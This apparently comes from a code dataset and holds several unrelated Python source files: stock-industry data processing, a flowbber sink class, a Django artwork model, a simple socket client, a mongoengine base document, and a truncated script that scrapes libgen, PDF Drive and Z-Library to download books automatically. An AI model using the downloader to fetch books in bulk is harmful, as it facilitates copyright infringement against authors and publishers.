CONSTATNS.LATEST\r\n offListed = sorted(list(set(stkInfo[:, 0]) - set(lastStks)))\r\n stkInfo = pd.DataFrame(stkInfo,columns=['stkcd','ipo_date','delist_date']).set_index('stkcd')\r\n offListedWind = ['{}.SH'.format(stkcd) if stkcd>=600000 else ''.join(['0'*(5-int(np.log10(stkcd))),'{}.SZ'.format(stkcd)]) for stkcd in offListed]\r\n offListedDate = [int(tdt.strftime('%Y%m%d')) for tdt in w.wss(offListedWind,'delist_date').Data[0]]\r\n stkInfo.loc[offListed,'delist_date'] = offListedDate\r\n stkInfo.reset_index(inplace=True)\r\n for tdt in trdDates:\r\n if tdt>=CONSTATNS.LATEST:\r\n break\r\n listedIdx = np.logical_and(stkInfo['ipo_date'].values<=tdt,stkInfo['delist_date'].values>=tdt)\r\n listedStocks = stkInfo.loc[listedIdx,'stkcd']\r\n histCut = histData.loc[np.isin(histData['stkcd'],listedStocks),:]\r\n histCutIdx = np.logical_and(histCut['indate'].values<=tdt,histCut['outdate'].values>tdt)\r\n histCut = histCut.loc[histCutIdx,['stkcd','swName1','swName2','swName3']]\r\n if histCut.empty:\r\n print('{} is empty'.format(tdt))\r\n histCut.to_csv(os.path.join(r'E:\\stocks_data\\sw_industry\\sw_data','sw_industry_{}.csv'.format(tdt)),index=False)\r\n\r\n\r\ndef sw_leve1_code(swName1,swName2,stkcd,tdate,lastNoChange,firstChange):\r\n if swName1 in CONSTATNS.swNameCodeDict:\r\n code = CONSTATNS.swNameCodeDict[swName1]\r\n elif swName1 in CONSTATNS.swChangeDict:\r\n if len(CONSTATNS.swChangeDict[swName1])==1: # 一一对应,直接返回即可\r\n code = CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][0]]\r\n else: # 旧名 一对多 新名,\r\n # 先通过 二级行业进行匹配\r\n name2Pair = np.array([name in swName2 for name in CONSTATNS.swChangeDict[swName1]])\r\n if swName2 in CONSTATNS.swChangeDict[swName1]: # 二级行业名 变更为 新一级行业名\r\n code = CONSTATNS.swNameCodeDict[swName2]\r\n elif swName1 == '金融服务' and swName2 != '银行': # 非银 特殊处理\r\n code = CONSTATNS.swNameCodeDict['非银金融']\r\n elif swName1 == '信息服务' and swName2=='网络服务':\r\n code = CONSTATNS.swNameCodeDict['计算机']\r\n elif np.any(name2Pair): # 新一级行业 包含于 旧二级行业\r\n code = CONSTATNS.swNameCodeDict[CONSTATNS.swChangeDict[swName1][np.argwhere(name2Pair)[0][0]]]\r\n else: # 二级行业匹配失败,按照行业变更后 该股票所属行业\r\n if stkcd in firstChange.index: # 若该股票行业变动时还为退市,对照改名后该股票所在的行业\r\n newName1 = firstChange.loc[stkcd,'swName1']\r\n if newName1 in CONSTATNS.swChangeDict[swName1]: # 变更后的行业名 处在 变更字典中\r\n code = CONSTATNS.swNameCodeDict[newName1]\r\n else: # 变更后股票未退市,但是该股票发生行业变更,且变更后行业 不属于变更字典,需要特殊处理\r\n code = np.nan\r\n else: # 行业变更时 股票已经退市 匹配失败\r\n code = np.nan\r\n else: #\r\n code = np.nan\r\n if tdate<=20131231: # 使变更前的行业恢复的更加均衡\r\n if (stkcd in firstChange.index) and (stkcd in lastNoChange.index):\r\n newName1 = firstChange.loc[stkcd, 'swName1']\r\n code = CONSTATNS.swNameCodeDict[newName1] if lastNoChange.loc[stkcd,'swName1']==swName1 else code # 与变更前对后一天相同的行业,使用变更后的代码\r\n return code\r\n\r\n\r\ndef update_sw_mat():\r\n\r\n trdDates = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\trddates.mat')['trddates'][:, 0]\r\n stkCodes = scio.loadmat(r'E:\\bqfcts\\bqfcts\\data\\stkinfo.mat')['stkinfo'][:, 0]\r\n ##### update mat #####\r\n swPath = r'E:\\stocks_data\\sw_industry\\sw_data'\r\n histMatName = 'data_19901219_20170630'\r\n histPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry','{}.mat'.format(histMatName))\r\n if not os.path.exists(histPath):\r\n histStkNum = 3433\r\n histDayNum = 6488\r\n histStks = stkCodes[:histStkNum]\r\n histTrds = trdDates[:histDayNum]\r\n histMat = pd.DataFrame(np.zeros([histStkNum,histDayNum]),index=histStks,columns=histTrds)\r\n firstChange = pd.read_csv(os.path.join(swPath,'sw_industry_20140102.csv'), encoding='gbk').set_index('stkcd')\r\n lastNoChange = pd.read_csv(os.path.join(swPath, 'sw_industry_20131231.csv'), encoding='gbk').set_index('stkcd')\r\n for tdt in histTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swCode1 = []\r\n for stkcd in swData.index.values:\r\n swName1 = swData.loc[stkcd, 'swName1']\r\n swName2 = swData.loc[stkcd, 'swName2']\r\n swCode1.append(sw_leve1_code(swName1=swName1,\r\n swName2=swName2,\r\n stkcd=stkcd,\r\n tdate=tdt,\r\n lastNoChange=lastNoChange,\r\n firstChange=firstChange))\r\n swData['swCode1'] = swCode1\r\n histMat.loc[swData.index,tdt] = swData['swCode1']\r\n print(tdt)\r\n scio.savemat(file_name=histPath, mdict={'swIndustry': histMat.values})\r\n print('hist mat created')\r\n currMatName = 'data_20150701_now'\r\n currPath = os.path.join(r'E:\\bqfcts\\bqfcts\\data\\SW_Industry', '{}.mat'.format(currMatName))\r\n currDayStart = 6000\r\n if not os.path.exists(currPath):\r\n currTrds = trdDates[currDayStart:]\r\n currMat = pd.DataFrame(np.zeros([stkCodes.shape[0], currTrds.shape[0]]), index=stkCodes, columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath,'sw_industry_{}.csv'.format(tdt)),encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index,tdt] = swData['swCode1']\r\n print(tdt)\r\n scio.savemat(file_name=currPath, mdict={'swIndustry':currMat.values})\r\n print('curr mat created')\r\n else:\r\n currDates = trdDates[currDayStart:]\r\n currStkcds = stkCodes\r\n currDayNum = currDates.shape[0]\r\n currStkNum = currStkcds.shape[0]\r\n currMatSaved = scio.loadmat(currPath)['swIndustry']\r\n (savedStkNum, savedDayNum) = currMatSaved.shape\r\n if (currDayNum == savedDayNum) and (currStkNum == savedStkNum):\r\n print('no data to update')\r\n return\r\n currTrds = currDates[currDayNum-2:] # 前一天的重新更新,弥补新股\r\n currMat = pd.DataFrame(np.zeros([currStkNum, currDayNum-savedDayNum+1]), index=stkCodes,columns=currTrds)\r\n for tdt in currTrds:\r\n swData = pd.read_csv(os.path.join(swPath, 'sw_industry_{}.csv'.format(tdt)), encoding='gbk').set_index('stkcd')\r\n swData['swCode1'] = swData['swName1'].map(CONSTATNS.swNameCodeDict)\r\n currMat.loc[swData.index, tdt] = swData['swCode1']\r\n patch = np.zeros([currStkNum-savedStkNum, savedDayNum - 1])\r\n currMat = np.column_stack([np.row_stack([currMatSaved[:,:-1],patch]), currMat.values])\r\n scio.savemat(file_name=currPath, mdict={'swIndustry': currMat})\r\n print('curr mat updated')\r\n\r\nif __name__=='__main__':\r\n update_sw_mat()\r\n # pr = scio.loadmat(r'C:\\Users\\Jiapeng\\Desktop\\matlab.mat')['t']\r\n # old = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20131231.csv',encoding='gbk').set_index('stkcd')\r\n # new = pd.read_csv(r'E:\\stocks_data\\sw_industry\\sw_data\\sw_industry_20140102.csv',encoding='gbk').set_index('stkcd')\r\n # data = pd.concat([old.loc[pr[:,0],'swName1'],new.loc[pr[:,0],'swName1']],axis=1)\r\n # data.to_csv(r'E:\\stocks_data\\sw_industry\\tempdict.csv')\r\n","repo_name":"wqxl309/sw_industry","sub_path":"history_sw_industry.py","file_name":"history_sw_industry.py","file_ext":"py","file_size_in_byte":10236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3227127025","text":"from abc import abstractmethod\n\nfrom .base import Component\nfrom ..utils.filter import filter_dict, load_filter_file\n\n\nclass Sink(Component):\n \"\"\"\n Main base class to implement a Sink.\n \"\"\"\n\n def __init__(\n self, index, type_, id_,\n optional=False, timeout=None, config=None\n ):\n super().__init__(\n index, type_, id_,\n optional=optional, timeout=timeout, config=config\n )\n\n def _component_execute(self, data):\n \"\"\"\n Sink component execute override.\n\n This function will just call the user provided ``distribute()``\n function with the input data and return an empty dictionary\n (\"no data\").\n \"\"\"\n self.distribute(data)\n return {}\n\n @abstractmethod\n def distribute(self, data):\n \"\"\"\n Distribute the collected data.\n\n All sinks subclasses must implement this abstract method.\n\n :param OrderedDict data: The collected data. This dictionary can be\n modified as required without consequences for the pipeline.\n \"\"\"\n pass\n\n\nclass FilterSink(Sink):\n \"\"\"\n Common sink base class that adds several inclusion and exclusion\n configuration options for filtering data before using it.\n\n See :ref:`filter-sink-options` for more information.\n \"\"\"\n\n def declare_config(self, config):\n config.add_option(\n 'include',\n default=['*'],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'include_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n config.add_option(\n 'exclude',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n },\n },\n )\n\n config.add_option(\n 'exclude_files',\n default=[],\n optional=True,\n schema={\n 'type': 'list',\n 'schema': {\n 'type': 'string',\n 'empty': False,\n },\n },\n )\n\n @abstractmethod\n def distribute(self, data):\n include = self.config.include.value\n for include_file in self.config.include_files.value:\n for pattern in load_filter_file(include_file):\n if pattern not in include:\n include.append(pattern)\n\n exclude = self.config.exclude.value\n for exclude_file in self.config.exclude_files.value:\n for pattern in load_filter_file(exclude_file):\n if pattern not in exclude:\n exclude.append(pattern)\n\n # Optimization when no filter is requested to the input data\n if include == ['*'] and not exclude:\n return\n\n filtered = filter_dict(data, include, exclude)\n data.clear()\n data.update(filtered)\n\n\n__all__ = [\n 'Sink',\n 'FilterSink',\n]\n","repo_name":"kuralabs/flowbber","sub_path":"lib/flowbber/components/sink.py","file_name":"sink.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18247102533","text":"from datetime import datetime\n\nfrom django.db.models import (\n ForeignKey,\n CharField,\n ImageField,\n Manager,\n ManyToManyField,\n PositiveIntegerField,\n Q,\n)\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom imagekit.models import ImageSpecField\nfrom imagekit.processors import ResizeToCover\nfrom model_utils.models import TimeStampedModel\n\nfrom .watermark import Watermark\n\nDRAWING_STATUS_STORED = 1\nDRAWING_STATUS_RESERVED = 2\nDRAWING_STATUS_SOLD = 3\n\nDRAWING_STATUS_CHOICES = (\n (DRAWING_STATUS_STORED, _('status-for-sale')),\n (DRAWING_STATUS_RESERVED, _('status-reserved')),\n (DRAWING_STATUS_SOLD, _('status-sold')),\n)\n\nDRAWING_AVAILABLE_STATES = [\n DRAWING_STATUS_STORED,\n]\n\n\nclass DrawingManager(Manager):\n def get_available(self):\n return self.filter(status__in=DRAWING_AVAILABLE_STATES)\n\n def get_price(self, ids):\n drawings = self.filter(id__in=ids).all()\n price = 0\n for drawing in drawings:\n price += drawing.get_price()\n\n return price\n\n\nclass Drawing(TimeStampedModel):\n objects = DrawingManager()\n name = CharField(\n max_length=255,\n verbose_name=_('field-name'),\n help_text=_('field-name-help-text'),\n )\n size = ForeignKey(\n 'DrawingSize',\n related_name='drawings',\n verbose_name=_('field-size'),\n )\n status = PositiveIntegerField(\n choices=DRAWING_STATUS_CHOICES,\n default=DRAWING_STATUS_STORED,\n verbose_name=_('field-drawing-status'),\n )\n image = ImageField(\n height_field=\"image_height\",\n upload_to='var/drawings',\n verbose_name=_(\"field-drawing-image\"),\n width_field=\"image_width\",\n )\n image_thumb_detail = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(600, 600),\n Watermark(\n 'web/static/images/watermark-black.png',\n 0.09,\n )\n ],\n )\n image_thumb_list = ImageSpecField(\n source='image',\n format='JPEG',\n options={'quality': 95},\n processors=[\n ResizeToCover(300, 300),\n Watermark(\n 'web/static/images/watermark-white.png',\n 0.1,\n ),\n ],\n )\n image_height = PositiveIntegerField(null=True)\n image_width = PositiveIntegerField(null=True)\n tags = ManyToManyField(\n 'DrawingTag',\n verbose_name=_('field-tags'),\n related_name='drawings',\n )\n\n class Meta:\n verbose_name = _('Drawing')\n verbose_name_plural = _('Drawings')\n\n def __str__(self):\n return '%s (%s)' % (self.name, self.size)\n\n def get_active_price_level(self):\n now = datetime.now()\n return self.price_levels.filter(\n (Q(valid_from__isnull=True) | Q(valid_from__gte=now)) &\n (Q(valid_until__isnull=True) | Q(valid_until__lte=now)),\n ).order_by('-created').first()\n\n def get_price(self):\n price_level = self.get_active_price_level()\n return price_level.price if price_level else None\n\n def is_price_visible(self):\n return self.status in DRAWING_AVAILABLE_STATES\n\n def is_status_visible(self):\n return self.status not in DRAWING_AVAILABLE_STATES\n\n def mark_as_reserved(self):\n self.status = DRAWING_STATUS_RESERVED\n\n def mark_as_sold(self):\n self.status = DRAWING_STATUS_SOLD\n\n def get_title(self):\n return '%s %s' % (self.size.name, self.name) if self.size.standalone_name else self.name\n","repo_name":"just-paja/malickosti-v-akvarelkach","sub_path":"drawings/models/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"504244575","text":"import socket\r\n\r\nserver_ip = '127.0.0.1'\r\nport = 9999\r\n\r\nclient = socket.socket()\r\n\r\nclient.connect((server_ip, port))\r\nprint('---Connected to server---')\r\n\r\nprint(\"type your name: \")\r\nmsg = input()\r\n\r\nclient.send(bytes(msg, 'utf-8'))\r\nprint('---Sent a message---')\r\n\r\nmsg = client.recv(1024)\r\nprint('---Got a message---')\r\nprint(msg)\r\n\r\nclient.close()\r\n","repo_name":"MysteryHub32/MysteryHub32","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3188205459","text":"from mongoengine import Document, DateTimeField, BooleanField\nimport datetime\n\nclass BaseDocument(Document):\n meta = {'allow_inheritance': True}\n created_on = DateTimeField()\n modified_on = DateTimeField()\n deleted = BooleanField(default=False)\n\n def save(self, *args, **kwargs):\n if not self.created_on:\n self.created_on = datetime.datetime.now()\n self.modified_on = datetime.datetime.now()\n super(BaseDocument, self).save(*args, **kwargs)\n","repo_name":"ismail2smile/BookingHotel","sub_path":"baseDocumentConfig.py","file_name":"baseDocumentConfig.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5722941418","text":"import fitz\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport webbrowser \nfrom pandas import Series\nfrom pandas import DataFrame\nfrom pandas import read_html\nfrom numpy import array\nimport os\nfrom os import remove as os_remove\nfrom os import path as os_path\nfrom os import stat\nfrom os.path import exists\nfrom threading import Thread\nfrom socket import gethostbyname\nfrom socket import gethostname\nfrom pathlib import Path\nfrom download import download\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom tkinter import Tk\nfrom tkinter import PhotoImage\nfrom tkinter import Canvas\nfrom tkinter import Label\nfrom tkinter import Text\nfrom tkinter import Button\nfrom tkinter import messagebox\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef epub_to_pdf_gen(): \n downloads_path = str(Path.home() / \"Downloads\")\n for fname in os.listdir(downloads_path):\n if fname.endswith('.epub'):\n fname_n = fname.split('.epub')[0]\n file_path_epub = f\"{downloads_path}\\\\{fname_n}.epub\"\n file_path_pdf = f\"{downloads_path}\\\\{fname_n}.pdf\"\n try:\n doc = fitz.open(file_path_epub)\n a = doc.convert_to_pdf()\n pdf = fitz.open(\"pdf\", a)\n pdf.save(file_path_pdf)\n doc.close()\n os_remove(file_path_epub)\n except:\n pass\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_character_not_valid_in_pdfname(a):\n char_list = \"/:?*<>|\"\n for i in char_list:\n a = a.replace(i, \"\")\n return a\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------\npdf_size_to_download_for_zlib = \"\"\nbyte_info_for_pdfdrive = \"\"\nkeep_running = True\n# --------------------------------------------------------- LIBGEN -----------------------------------------------------------------------------------------\ndef downloaded_stat_for_libgen(Pdf_file_size_to_download):\n global keep_running\n while keep_running:\n for fname in os.listdir(downloads_path):\n if fname.endswith('.part'):\n try:\n file_size = os.path.getsize(f\"{downloads_path}\\\\{fname}\")\n info_text.config(text=f'Downloading....{round((file_size / (1024 * 1024)),1)} {Pdf_file_size_to_download.split()[1]} / {Pdf_file_size_to_download}')\n time.sleep(0.2) \n except Exception as e:\n print(e)\n if(keep_running == False):\n break\ndef search_in_libgen(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user \n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"+\")\n link_to_search = f\"https://libgen.is/search.php?req={to_search_online}&open=0&res=100&view=simple&phrase=1&column=title\"\n download_of_libgen_completed = False\n # ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n list_of_dataframes = read_html(link_to_search)\n table = list_of_dataframes[2]\n a = list(table.loc[0])\n table.columns = a\n table.drop(0, axis=0, inplace=True)\n table.reset_index(inplace=True)\n table = table[(table['Extension'] == extension)]\n table.sort_values('Year', ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n titles_list = [soup.find_all('a', id=x)[0].getText() for x in table['ID']]\n table['Title'] = Series(titles_list, index=table.index, dtype='str')\n table = table.astype({'Author(s)': str, 'Title': str})\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n table_2 = table[['Author(s)', 'Title']]\n index_number = 0\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author):\n actual_author_name = table_2['Author(s)'][index_for_author].split(\" \") \n result = False\n for word in actual_author_name:\n if (word in author):\n result = True\n break\n if(len(author) == 0):\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book):\n len_of_book_searched = len(to_search.split(\" \"))\n len_of_book_by_libgen = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \")\n split_of_book_by_libgen = title_of_book.lower().split(\" \")\n no_of_matches = 0\n if(len_of_book_searched <= len_of_book_by_libgen):\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_searched):\n no_of_matches = 0\n for i in range(0, len_of_book_searched):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n else:\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_libgen[i].lower() in split_of_book_by_user[i].lower()):\n no_of_matches += 1\n if(no_of_matches != len_of_book_by_libgen):\n no_of_matches = 0\n for i in range(0, len_of_book_by_libgen):\n if(split_of_book_by_user[i].lower() in split_of_book_by_libgen[i].lower()):\n no_of_matches += 1\n return ((no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_libgen))\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n for i in table_2.index:\n if((check_for_title(table_2['Title'][i])) & (check_for_author(i))):\n book_found = True\n index_number = i\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if(book_found):\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".c > tr > td > a\")\n c = []\n for i in a:\n b = i.get('href')\n if(b.find(\"book\") == 0):\n c.append(b.split(\"=\")[1])\n index_of_book_to_download = c\n link_of_download_page = f\"http://library.lol/main/{index_of_book_to_download[index_number]}\"\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n result_2 = requests.get(link_of_download_page)\n soup = BeautifulSoup(result_2.text, \"lxml\")\n d = soup.select(\"#download > h2 > a\")\n download_link = d[0].get('href')\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n url = download_link\n book_name = remove_character_not_valid_in_pdfname(table_2['Title'][index_number])\n downloads_path = str(Path.home() / \"Downloads\")\n global keep_running\n if(extension == 'pdf'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.pdf\"\n file_path_while_downloading = f\"{downloads_path}\\\\{book_name}.pdf.part\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0) \n button_1['state'] = \"normal\" \n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n elif(extension == 'epub'):\n info_text.config(text=\"Downloading....\")\n file_path = f\"{downloads_path}\\\\{book_name}.epub\"\n pdf_file_size_to_download = table.loc[index_number][\"Size\"]\n thread_3 = Thread(target=downloaded_stat_for_libgen,args=(pdf_file_size_to_download,))\n thread_3.start()\n path = download(url, file_path, replace=True,kind=\"file\", timeout=300.0)\n epub_to_pdf_gen()\n button_1['state'] = \"normal\"\n keep_running = False\n info_text.config(text=\"Book has been downloaded!\")\n download_of_libgen_completed = True\n else:\n download_of_libgen_completed = False\n return download_of_libgen_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ----------------------------------------------------------- PDF-Drive ------------------------------------------------------------------------------------------\ndef search_in_pdf_drive(author_searched_by_user, book_searched_by_user):\n author = author_searched_by_user\n author = author.split()\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = to_search.replace(\" \", \"-\")\n link_to_search = f\"http://www.pdfdrive.com/{to_search_online}-books.html\"\n download_of_pdfdrive_completed = False\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n name_of_books = soup.select(\".ai-search > h2\")\n year_of_books = soup.select(\".file-info > .fi-year \")\n downloads_of_books = soup.select(\".file-info > .fi-hit\")\n to_make_download_links = soup.select(\".file-right > a \")\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n a = []\n b = []\n for x in name_of_books:\n a.append(x.getText())\n for y in downloads_of_books:\n b.append(int(y.getText().split(\" \")[0].replace(\",\", \"\")))\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n df_book = DataFrame(data=zip(a, b), columns=[\"Book\", \"Downloads\"])\n df_book = df_book.astype({\"Book\": str, \"Downloads\": int})\n df_book.sort_values(\"Downloads\", ascending=False, inplace=True)\n index_of_book = -1\n for x in df_book.index:\n if df_book.loc[x][\"Book\"].lower().find(to_search.lower()) == 0:\n index_of_book = x\n break\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if index_of_book > -1:\n raw_download_link = to_make_download_links[index_of_book].get(\"href\")\n download_link = raw_download_link[::-1].replace(\"e\", \"d\", 1)[::-1]\n link_of_download_page = f\"http://www.pdfdrive.com{download_link}\"\n result = requests.get(f\"http://www.pdfdrive.com{raw_download_link}\")\n soup = BeautifulSoup(result.text, \"lxml\")\n book_info_for_pdfdrive = soup.select(\".ebook-file-info > .info-green\")\n global byte_info_for_pdfdrive\n for i in book_info_for_pdfdrive:\n if \"KB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n elif \"MB\" in i.getText():\n byte_info_for_pdfdrive = i.getText()\n break\n download_of_pdfdrive_completed = selenium_headless_downloader(\"pdfdrive\", link_of_download_page, \"pdf\")\n else:\n download_of_pdfdrive_completed = False\n except:\n pass\n return download_of_pdfdrive_completed\n# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------ Zlib --------------------------------------------------------------------------------\ndef search_in_zlib(author_searched_by_user, book_searched_by_user, extension):\n author = author_searched_by_user\n to_search = book_searched_by_user\n pdf_title = to_search\n to_search_online = (to_search.replace(\" \", \"%20\") + \"%20\" + author.replace(\" \", \"%20\"))\n link_to_search = f\"https://b-ok.asia/s/{to_search_online}/?languages%5B0%5D=english&extensions%5B0%5D={extension}\"\n author = author.split()\n download_of_zlib_completed = False\n # --------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n try:\n result = requests.get(link_to_search)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.select(\".book-rating-interest-score\")\n b = soup.select(\".book-rating-quality-score\")\n book_rating_interest_score_list = array([float(x.getText().strip()) for x in a])\n book_rating_quality_score_list = array([float(y.getText().strip()) for y in b])\n rating_of_book_list = (book_rating_interest_score_list + book_rating_quality_score_list)\n d = soup.find_all(\"h3\", itemprop=\"name\")\n link_of_book_list = [(\"https://b-ok.asia\" + x.select(\"a\")[0].get(\"href\")) for x in d]\n title_of_book_list = [x.select(\"a\")[0].getText() for x in d]\n # ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n e = soup.find_all(\"div\", class_=\"authors\")\n author_list = []\n for length in e:\n individual_author_name = \"\"\n for element in length:\n individual_author_name = individual_author_name + element.getText() + \" \"\n author_list.append(individual_author_name)\n books_dataframe = DataFrame({\"Title\": title_of_book_list,\"Author\": author_list,\"Rating\": rating_of_book_list,\"Link\": link_of_book_list,})\n books_dataframe = books_dataframe.astype({\"Title\": str, \"Author\": str, \"Rating\": float, \"Link\": str})\n books_dataframe.sort_values(\"Rating\", ascending=False, inplace=True)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_author(index_for_author,): \n actual_author_name = books_dataframe[\"Author\"][index_for_author].split(\" \") \n result = (False)\n for (word) in (actual_author_name): \n if word in author: \n result = True\n break\n if len(author) == 0:\n result = True\n return result\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n def check_for_title(title_of_book,): \n len_of_book_searched = len(to_search.split(\" \")) \n len_of_book_by_zlib = len(title_of_book.split(\" \"))\n split_of_book_by_user = to_search.lower().split(\" \") \n split_of_book_by_zlib = title_of_book.lower().split(\" \") \n no_of_matches = 0 \n for i in range(0, len_of_book_by_zlib): \n if (split_of_book_by_zlib[i].lower() in to_search.lower()): \n no_of_matches += (1)\n if no_of_matches != len_of_book_by_zlib:\n no_of_matches = 0\n for i in range(0, len_of_book_searched): \n if (split_of_book_by_user[i].lower() in title_of_book.lower()): \n no_of_matches += 1\n return (no_of_matches == len_of_book_searched) or (no_of_matches == len_of_book_by_zlib)\n # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n book_found = False\n index_number = 0\n for(i) in (books_dataframe.index): \n if (check_for_title(books_dataframe[\"Title\"][i])) & (check_for_author(i)): \n book_found = True\n index_number = i \n break\n # ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n if book_found:\n link_of_download_page = books_dataframe.loc[index_number, \"Link\"]\n try:\n result = requests.get(link_of_download_page)\n soup = BeautifulSoup(result.text, \"lxml\")\n global pdf_size_to_download_for_zlib\n pdf_size_to_download_for_zlib = soup.select(\".bookDetailsBox > .bookProperty.property__file > .property_value \")[0].getText().split(\",\")[1]\n except:\n print(\"Error faced\")\n download_of_zlib_completed = selenium_headless_downloader(\"zlib\", link_of_download_page, extension)\n else:\n download_of_zlib_completed = False\n except:\n pass\n return download_of_zlib_completed\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------ SELENIUM FOR PDF-DRIVE & ZLIB ----------------------------------------------------------------\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os_path.dirname(__file__)\n return os_path.join(base_path, relative_path)\n# ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef remove_unwanted_characters_for_pdfdrive(pdf_name: str,) -> str:\n chars = list(\"/:?*<>|,.();\")\n result = pdf_name\n for char in chars:\n result = result.replace(char, \"_\")\n return result\ndownloads_path = str(Path.home() / \"Downloads\")\n# -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_pdfdrive(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", class_=\"ebook-title\")\n title_of_book = a.select(\"a\")[0].getText()\n title_of_book = title_of_book.replace(\":\", \"_\")\n return title_of_book\n# ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef book_title_for_zlib(download_link):\n result = requests.get(download_link)\n soup = BeautifulSoup(result.text, \"lxml\")\n a = soup.find(\"h1\", itemprop=\"name\").getText()\n a = a.strip(\" \\n\")\n b = soup.find(\"div\", class_=\"col-sm-9\")\n b = b.find_all(\"a\", title=\"Find all the author's books\")\n title_of_pdf = a\n c = \"\"\n if len(b) > 1:\n for x in b:\n c = c + x.getText() + \", \"\n c = c.strip(\", \")\n title_of_pdf = title_of_pdf + \" \" + f\"({c})\"\n elif len(b) == 1:\n title_of_pdf = title_of_pdf + \" \" + f\"({b[0].getText()})\"\n return title_of_pdf\n# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\ndef selenium_headless_downloader(website, download_link, extension):\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 